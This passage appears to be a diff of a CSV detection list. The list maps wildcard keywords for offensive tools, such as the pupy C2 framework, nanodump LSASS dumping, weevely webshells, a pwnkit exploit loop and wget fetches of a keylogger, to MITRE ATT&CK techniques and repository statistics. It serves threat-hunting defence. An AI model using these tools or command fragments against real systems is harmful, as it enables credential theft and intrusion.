 "*WebBrowserPassView.zip*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*webcamsnap -v*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*webcamsnap -v*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*webclientservicescanner -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z"
 "*webdavC2.py*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z"
@@ -18163,42 +18349,42 @@
 "*webshell-exegol.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*weevely generate *.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*weevely https://*.php * id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*Welcome to OpenBullet 2*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z"
+"*Welcome to OpenBullet 2*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z"
 "*wePWNise*","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","4","351","107","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z"
-"*werdhaihai/AtlasReaper*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z"
+"*werdhaihai/AtlasReaper*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z"
 "*werfault_shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
 "*werfault_silent_process_exit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
 "*WerTrigger.exe*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z"
 "*WerTrigger-master*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z"
 "*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*wfencode -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfencode -e *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfencode.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfencode.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfpayload -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfpayload.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfpayload.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfencode -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfencode -e *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfencode.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfencode.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfpayload -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfpayload.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfpayload.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
 "*WfpEscalation.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
 "*WfpTokenDup.exe -*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
 "*wfuzz --*.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfuzz.get_payload*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfuzz.wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzz.get_payload*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzz.wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
 "*wfuzz/wordlist*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*wfuzz-cli.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*wfuzzp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzz-cli.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*wfuzzp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
 "*wgen.py*","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","1","96","37","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z"
 "*wget *http-vuln-cve2020-5902.nse*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*wget* -O les.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
-"*wget*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
-"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*wget*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
+"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
 "*Wh04m1001/DFSCoerce*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z"
 "*wh0amitz/BypassCredGuard*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z"
-"*wh0amitz/S4UTomato*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*wh0amitz/S4UTomato*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
 "*Wh1t3Fox/polenum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*WhatBreach*","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","945","152","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z"
+"*WhatBreach*","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","946","152","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z"
 "*whatlicense-main.zip*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
 "*whereami.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z"
 "*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z"
@@ -18206,75 +18392,77 @@ "*WheresMyImplant.git*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*WheresMyImplant.sln*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*while * do mv *GCONV_PATH=./value* done","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from 